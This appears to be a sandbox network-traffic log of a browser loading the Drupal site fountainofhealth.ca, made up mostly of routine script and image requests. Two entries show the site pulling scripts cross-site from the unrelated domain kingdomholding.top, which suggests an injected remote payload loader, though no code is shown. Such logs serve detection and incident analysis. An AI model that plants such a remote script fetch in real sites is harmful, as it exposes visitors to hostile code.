Source: global traffic	HTTP traffic detected: GET /core/misc/jquery.tabbable.shim.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/js/banner-slider.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/message.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/tooltip.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/displace.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/popover.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/states.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/dialog.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/modal.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/position.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/dialog/dialog.position.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/dialog/dialog.ajax.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/ajax.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/views_slideshow/js/views_slideshow.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/dialog.ajax.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /libraries/json2/json2.js?v=2 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/dialog/dialog.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1host: www.youtube.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ss/index.php?FLeFJ5nY HTTP/1.1Host: kingdomholding.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175
Source: global traffic	HTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1host: www.youtube.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/6fab0cec561d/main.js? HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /ss/index.js?5e7da6cb85fe8b1284 HTTP/1.1Host: kingdomholding.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
